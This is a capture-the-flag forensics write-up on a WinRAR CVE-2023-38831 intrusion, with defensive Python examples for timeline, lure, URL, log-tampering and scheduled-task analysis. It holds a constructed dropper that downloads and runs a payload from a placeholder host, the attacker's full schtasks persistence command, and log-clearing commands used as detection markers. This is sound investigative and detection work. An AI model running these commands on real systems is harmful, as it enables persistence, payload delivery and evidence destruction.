SpottedInTheWild challenge

Q1 In your investigation into the FinTrust Bank breach, you found an application that was the entry point for the attack. Which application was used to download the malicious file?


After investigating the files we found one called SANS SEC401. Its hash, 1FBD3CA9FCFEA5AAC390EA38FF818CC9 (MD5), was checked on VirusTotal, which reports the file as malicious.
I also uploaded the file to the any.run sandbox to get more details about it.
So the application used to download the malicious file is Telegram: the file sits under C:\Users\Administrator\Downloads\Telegram Desktop\SANS SEC401.

Q2 Finding out when the attack started is critical. What is the UTC timestamp for when the suspicious file was first downloaded?


For this question we can use the $MFT (Master File Table). It holds a record for every file on the NTFS volume, with its path, size and timestamps, so it tells us when the download was written to disk.
To get information out of the $MFT we use two tools: one to parse the raw file into a CSV, and one to view and filter that CSV.
1 - MFTECmd 2 - Timeline Explorer
The file was first downloaded at 2024-02-03 07:33:20 UTC.
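The same lookup done in code, as an added example that is not part of the original writeup: it reads the CSV that MFTECmd produces, finds the earliest creation time of the downloaded file under the Telegram Desktop folder, and also flags records whose $STANDARD_INFORMATION creation time is older than the $FILE_NAME one (a sign the timestamps were tampered with). The column names (InUse, ParentPath, FileName, Created0x10, Created0x30) are assumed to match MFTECmd's output, and the CSV rows are constructed for this example.

```python
"""Locate a file's first on-disk creation time in a parsed $MFT.

Added example, not code from the writeup. It reads the CSV that MFTECmd
writes; the column names used here are assumed to match MFTECmd's output and
the sample CSV below is constructed for this example.
"""
import csv
import io
from datetime import datetime, timezone

# Constructed sample. MFTECmd timestamps are UTC with 7 fractional digits.
SAMPLE_MFT_CSV = """EntryNumber,InUse,ParentPath,FileName,Extension,FileSize,Created0x10,Created0x30,LastModified0x10
1001,True,.\\Users\\Administrator\\Downloads\\Telegram Desktop,SANS SEC401.rar,.rar,843210,2024-02-03 07:33:20.1234567,2024-02-03 07:33:20.1234567,2024-02-03 07:33:21.0000000
1002,True,.\\Users\\Administrator\\Downloads\\Telegram Desktop,notes.txt,.txt,120,2024-01-30 10:00:00.0000000,2024-01-30 10:00:00.0000000,2024-01-30 10:00:00.0000000
1003,True,.\\Users\\Administrator\\Downloads,SANS SEC401.rar,.rar,843210,2024-02-03 07:40:02.0000000,2024-02-03 07:40:02.0000000,2024-02-03 07:40:02.0000000
1004,True,.\\Windows\\Temp,run.bat,.bat,55,2020-01-01 00:00:00.0000000,2024-02-03 07:39:10.0000000,2020-01-01 00:00:00.0000000
"""


def parse_mft_time(value):
    """Parse 'YYYY-MM-DD HH:MM:SS.fffffff' into an aware UTC datetime."""
    main, _, frac = value.partition(".")
    micro = int((frac + "000000")[:6]) if frac else 0  # 100 ns ticks -> microseconds
    return datetime.strptime(main, "%Y-%m-%d %H:%M:%S").replace(
        microsecond=micro, tzinfo=timezone.utc
    )


def rows(csv_text):
    """In-use records only; deleted entries keep stale names and times."""
    return [r for r in csv.DictReader(io.StringIO(csv_text)) if r["InUse"] == "True"]


def find_first_created(csv_text, filename, path_hint=""):
    """Earliest $STANDARD_INFORMATION creation time of a record named
    `filename`, optionally limited to parent paths containing `path_hint`.
    Returns (utc_datetime, full_path) or None."""
    best = None
    for r in rows(csv_text):
        if r["FileName"].lower() != filename.lower():
            continue
        if path_hint.lower() not in r["ParentPath"].lower():
            continue
        created = parse_mft_time(r["Created0x10"])
        if best is None or created < best[0]:
            best = (created, r["ParentPath"] + "\\" + r["FileName"])
    return best


def timestomp_suspects(csv_text):
    """Files whose $STANDARD_INFORMATION creation time is older than the
    $FILE_NAME creation time. User-mode tools can rewrite the former but not
    the latter, so this ordering is a classic sign of timestomping."""
    return [
        r["FileName"]
        for r in rows(csv_text)
        if parse_mft_time(r["Created0x10"]) < parse_mft_time(r["Created0x30"])
    ]


if __name__ == "__main__":
    when, path = find_first_created(SAMPLE_MFT_CSV, "SANS SEC401.rar", "Telegram Desktop")
    print(f"first created {when:%Y-%m-%d %H:%M:%S} UTC at {path}")
    print("timestomp suspects:", timestomp_suspects(SAMPLE_MFT_CSV))
```

Point the script at a real `MFTECmd.exe -f $MFT --csv out` result and the same two functions answer this question and the one Timeline Explorer cannot answer at a glance: whether any of the attacker's files had their clocks rewritten.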


Q3 Knowing which vulnerability was exploited is key to improving security. What is the CVE identifier of the vulnerability used in this attack?


For this question threat intelligence helped us identify the CVE, using two websites: 1 - VirusTotal 2 - any.run
CVE-2023-38831: WinRAR before 6.23 allows attackers to execute arbitrary code.

To fix this vulnerability we have to update WinRAR to the latest version (6.23 or later).

Q4 In examining the downloaded archive, you noticed a file in with an odd extension indicating it might be malicious. What is the name of this file?


The file with the odd extension is SANS SEC401.pdf .cmd, inside SANS SEC401.rar. The space before .cmd makes the name read like a PDF while Windows runs it as a command script.
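A detector for that naming pattern, serving both the CVE and the odd-extension questions, as an added example that is not code from the writeup: it takes a plain list of archive entry names (from `unrar l` or `zipfile.namelist()`), so nothing is extracted or executed, and it flags any leaf name shaped like "document.pdf .cmd". It also carries a helper that compares a WinRAR version against the 6.23 fix. The sample listing is constructed around the name the writeup reports.

```python
"""Flag archive entries shaped like the CVE-2023-38831 lure.

Added example, not code from the writeup. It works on a plain list of entry
names, so nothing is extracted or executed. The sample listing is constructed
around the name the writeup reports, "SANS SEC401.pdf .cmd".
"""
import re
import zipfile

# Extensions the Windows shell executes on double-click.
EXEC_EXT = {"cmd", "bat", "exe", "vbs", "js", "ps1", "scr", "com", "wsf", "hta", "lnk"}
# Extensions a user expects to be harmless documents or images.
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "jpg", "png", "txt"}

# "<name>.<doc ext><space(s)>.<exec ext>", e.g. "SANS SEC401.pdf .cmd"
DOUBLE_EXT = re.compile(
    r"^(?P<decoy>.+\.(?P<doc>[A-Za-z0-9]{1,5}))\s+\.(?P<exe>[A-Za-z0-9]{1,4})$"
)

SAMPLE_LISTING = [  # constructed listing of an archive's entries
    "SANS SEC401.pdf",
    "SANS SEC401.pdf /",
    "SANS SEC401.pdf /SANS SEC401.pdf .cmd",
    "readme.txt",
    "images/cover.png",
]


def find_lure_entries(names):
    """One finding per entry whose leaf name is a document name followed by
    a space and an executable extension."""
    findings = []
    for name in names:
        leaf = name.replace("\\", "/").rstrip("/").rsplit("/", 1)[-1]
        m = DOUBLE_EXT.match(leaf)
        if not m or m.group("exe").lower() not in EXEC_EXT:
            continue
        findings.append({
            "entry": name,
            "decoy": m.group("decoy"),
            "executes_as": m.group("exe").lower(),
            # a document-looking decoy is the classic lure; anything else is still odd
            "severity": "high" if m.group("doc").lower() in DOC_EXT else "medium",
        })
    return findings


def scan_zip(path):
    """Convenience wrapper for ZIP files; for RAR, feed `unrar l` names in."""
    with zipfile.ZipFile(path) as zf:
        return find_lure_entries(zf.namelist())


def winrar_is_vulnerable(version):
    """CVE-2023-38831 is fixed in WinRAR 6.23; anything older is affected."""
    major, minor = (int(x) for x in version.split(".")[:2])
    return (major, minor) < (6, 23)


if __name__ == "__main__":
    for f in find_lure_entries(SAMPLE_LISTING):
        print(f"{f['severity']}: {f['entry']!r} looks like {f['decoy']!r} but runs as .{f['executes_as']}")
    print("WinRAR 6.22 vulnerable:", winrar_is_vulnerable("6.22"))
```

Run it over mail-gateway or EDR archive listings and the high-severity hits are exactly the files a user would have double-clicked thinking they were course notes.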

Q5 Uncovering the methods of payload delivery helps in understanding the attack vectors used. What is the URL used by the attacker to download the second stage of the malware?


For this question there are three ways to get it.
First, run the file with the .cmd extension in an isolated OS (an analysis VM with no access to the real network); we will see the URL of the second stage of the malware.
Second, use threat intelligence: any.run shows the command the malicious .cmd file executed.
Third, use two tools together, Wireshark and FakeNet: FakeNet answers the malware's network requests and Wireshark captures them, so we see the requests to the malicious website and obtain the URL from them.
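The three methods above are all dynamic. A static companion, added here as an example and not part of the writeup, pulls the URLs out of the .cmd text without running it, refangs analyst-style defanged forms (hxxp, [.]) so the indicator is usable, and defangs again for the report. The script text is constructed with example.invalid hostnames; the real second-stage URL from the case is not reproduced.

```python
"""Extract second-stage URLs from a .cmd dropper without executing it.

Added example, not the writeup's code. The script text below is constructed
and uses example.invalid hostnames.
"""
import re

SAMPLE_CMD = r"""@echo off
echo Preparing course material ...
powershell -Command "Invoke-WebRequest -Uri 'http://stage2.example.invalid/update/stage2.dat' -OutFile %TEMP%\stage2.dat"
rem fallback mirror: hxxps://mirror[.]example[.]invalid/stage2.dat
start "" %TEMP%\stage2.dat
"""

# http/https and the defanged hxxp/hxxps spellings, up to whitespace or a quote
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://[^\s'\"<>]+", re.IGNORECASE)


def refang(url):
    """Turn analyst-defanged text (hxxp, [.], (.), [:]) back into a real URL."""
    url = re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)
    return url.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def defang(url):
    """Make a URL safe to paste into a report: hxxp scheme and [.] in the host."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def extract_urls(script_text):
    """Unique URLs in order of first appearance, refanged, with trailing
    punctuation stripped so 'url.' or 'url)' does not pollute the IOC."""
    seen, out = set(), []
    for m in URL_RE.finditer(script_text):
        url = refang(m.group(0)).rstrip(".,;)\"'")
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_CMD):
        print("second-stage candidate:", defang(url))
```

Static extraction misses URLs that are assembled at runtime or obfuscated, which is why the sandbox and FakeNet captures above remain the authoritative source; the static pass is the quick first triage and the report formatter.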

Q6 To further understand how attackers cover their tracks, identify the script they used to tamper with the event logs. What is the script name?


The event logs are stored on the system under C:\Windows\System32\winevt\Logs.
To read the events we use the application Event Log Explorer.
Then we open the Windows PowerShell event log to see what was run inside it: the script is Eventlogs.ps1.

Q7 Knowing when unauthorized actions happened helps in understanding the attack. What is the UTC timestamp for when the script that tampered with event logs was run?


We can see the time here, but the viewer shows local time, so we need to subtract 2 hours to get UTC:
2024-02-03 07:38:01
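The log-tampering hunt and the UTC correction from the last two questions, as one added example that is not the writeup's code: it walks an exported event list, flags the events that record a cleared log (Security 1102, System 104) and PowerShell script blocks (4104) that contain log-clearing commands, pulls the script path out of the block, and converts the viewer's local timestamps to UTC. The CSV layout (time_local,channel,event_id,message) is a constructed stand-in for an Event Log Explorer or Get-WinEvent export, the +2 hour offset comes from the writeup's note, and the full path under C:\Users\Administrator for Eventlogs.ps1 is assumed.

```python
"""Spot event-log tampering in exported events and normalise times to UTC.

Added example, not the writeup's own code. The export format is a constructed
CSV; the local offset of +2 hours is taken from the writeup, and the script
path under C:\\Users\\Administrator is assumed.
"""
import csv
import io
import re
from datetime import datetime, timedelta, timezone

LOCAL_TZ = timezone(timedelta(hours=2))  # the viewer showed local time, UTC+2

# Event IDs that directly record a cleared log.
CLEARED_LOG_EVENTS = {1102: "Security log cleared", 104: "System/Application log cleared"}
# Script-block content (PowerShell 4104) that wipes logs.
SCRIPT_MARKERS = ("clear-eventlog", "wevtutil cl", "wevtutil.exe cl", "remove-eventlog")

SAMPLE_EVENTS = """time_local,channel,event_id,message
2024-02-03 09:35:12,Security,4624,An account was successfully logged on.
2024-02-03 09:38:01,Microsoft-Windows-PowerShell/Operational,4104,"Creating Scriptblock text (1 of 1): Clear-EventLog -LogName Security,System,Application
Path: C:\\Users\\Administrator\\Eventlogs.ps1"
2024-02-03 09:38:03,Security,1102,The audit log was cleared.
2024-02-03 09:38:04,System,104,The System log file was cleared.
2024-02-03 09:40:00,Security,4624,An account was successfully logged on.
"""


def to_utc(local_str, tz=LOCAL_TZ):
    """'YYYY-MM-DD HH:MM:SS' in the viewer's local zone -> aware UTC datetime."""
    return datetime.strptime(local_str, "%Y-%m-%d %H:%M:%S").replace(tzinfo=tz).astimezone(timezone.utc)


def find_log_tampering(csv_text):
    """Events that clear logs, or script blocks that would, with UTC times."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        eid = int(row["event_id"])
        msg = row["message"]
        reason, script = None, None
        if eid in CLEARED_LOG_EVENTS:
            reason = CLEARED_LOG_EVENTS[eid]
        elif eid == 4104 and any(k in msg.lower() for k in SCRIPT_MARKERS):
            reason = "script block clears event logs"
            m = re.search(r"Path:\s*(\S.*?\.ps1)", msg, re.IGNORECASE)
            script = m.group(1) if m else None
        if reason:
            findings.append({
                "utc": to_utc(row["time_local"]),
                "channel": row["channel"],
                "event_id": eid,
                "reason": reason,
                "script": script,
            })
    return findings


if __name__ == "__main__":
    for f in find_log_tampering(SAMPLE_EVENTS):
        print(f"{f['utc']:%Y-%m-%d %H:%M:%S} UTC  {f['channel']}  {f['event_id']}  {f['reason']}  {f['script'] or ''}")
```

The 4104 record is the valuable one: a cleared log still leaves the 1102/104 marker behind, but the script block is what names the tool that did it and, with script-block logging enabled, it survives the clearing of other channels.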

Q8 We need to identify if the attacker maintained access to the machine. What is the command used by the attacker for persistence?


There is more than one persistence technique, and all of them leave traces in the registry.
The most common are autorun keys, scheduled tasks, and so on.
So let's search for them.
I found HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\whoisthebaba,
which means the attacker used a scheduled task to get persistence on the system.
If we look at the command written in cmd, captured by the any.run threat-intelligence sandbox,
we find it: schtasks /create /sc minute /mo 3 /tn "whoisthebaba" /tr C:\Windows\Temp\run.bat /RL HIGHEST
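Triage of that command line in code, as an added example that is not the writeup's own: it parses a `schtasks /create` command into its options, lists the traits that separate attacker persistence from admin work (highest run level, an action in a temp directory, a script rather than a signed binary, a minute-level schedule), and matches the task name against the TaskCache\Tree key so the registry hit and the command line can be tied together. The command and registry key are the ones the writeup reports; the benign comparison command is constructed.

```python
"""Triage a schtasks /create command line for persistence indicators.

Added example, not from the writeup. The command line and registry key are
the ones the writeup reports; the benign comparison command is constructed.
"""
import re

PAGE_CMD = r'schtasks /create /sc minute /mo 3 /tn "whoisthebaba" /tr C:\Windows\Temp\run.bat /RL HIGHEST'
PAGE_REG = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\whoisthebaba"
BENIGN_CMD = r'schtasks /create /sc daily /st 03:00 /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"'  # constructed

SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta")
WRITABLE_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\programdata\\", "\\users\\public\\")


def parse_schtasks(cmdline):
    """Options of a `schtasks /create` command as a dict, or None if the
    line is not a task creation."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)  # keep quoted values whole
    if not tokens:
        return None
    exe = tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in ("schtasks", "schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1].strip('"')
                i += 2
                continue
            opts[key] = True  # bare switch such as /create
        i += 1
    if "create" not in opts:
        return None
    return {
        "name": opts.get("tn"),
        "schedule": (opts.get("sc") or "").lower(),
        "modifier": opts.get("mo"),
        "action": opts.get("tr"),
        "run_level": (opts.get("rl") or "").upper(),
        "run_as": opts.get("ru"),
    }


def persistence_indicators(task):
    """Reasons a parsed task looks like attacker persistence rather than admin work."""
    reasons = []
    action = (task["action"] or "").lower()
    if task["run_level"] == "HIGHEST":
        reasons.append("runs with highest privileges")
    if any(d in action for d in WRITABLE_DIRS):
        reasons.append("action lives in a temp or user-writable directory")
    if action.endswith(SCRIPT_EXT):
        reasons.append("action is a script, not a signed binary")
    if task["schedule"] == "minute" and int(task["modifier"] or 1) <= 5:
        reasons.append("runs every few minutes (beacon-like)")
    if (task["run_as"] or "").upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
        reasons.append("runs as SYSTEM")
    return reasons


def task_name_from_registry(key_path):
    """Task name from a TaskCache\\Tree\\<name> key, so a registry hit can be
    matched to the command line that created it."""
    m = re.search(r"\\TaskCache\\Tree\\(.+)$", key_path, re.IGNORECASE)
    return m.group(1) if m else None


if __name__ == "__main__":
    task = parse_schtasks(PAGE_CMD)
    print("registry task:", task_name_from_registry(PAGE_REG), "matches command:", task["name"])
    for reason in persistence_indicators(task):
        print(" -", reason)
    print("benign task indicators:", persistence_indicators(parse_schtasks(BENIGN_CMD)))
```

Feed it the command lines from Sysmon event 1 or the 4698 "scheduled task created" events and the tasks with three or more indicators are the ones worth opening first; the TaskCache\Tree lookup confirms the task actually landed in the registry.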

Q9 To understand the attacker's data exfiltration strategy, we need to locate where they stored their harvested data. What is the full path of the file storing the data collected by one of the attacker's tools in preparation for data exfiltration?


While searching I found a file with a .txt extension holding information about which IPs are alive. That means the attacker used a ping-sweep tool to find live hosts,
in order to move laterally and attack other systems on the same network.
C:\Users\Administrator\AppData\Local\Temp\BL4356.txt

Contributors

0xt7n
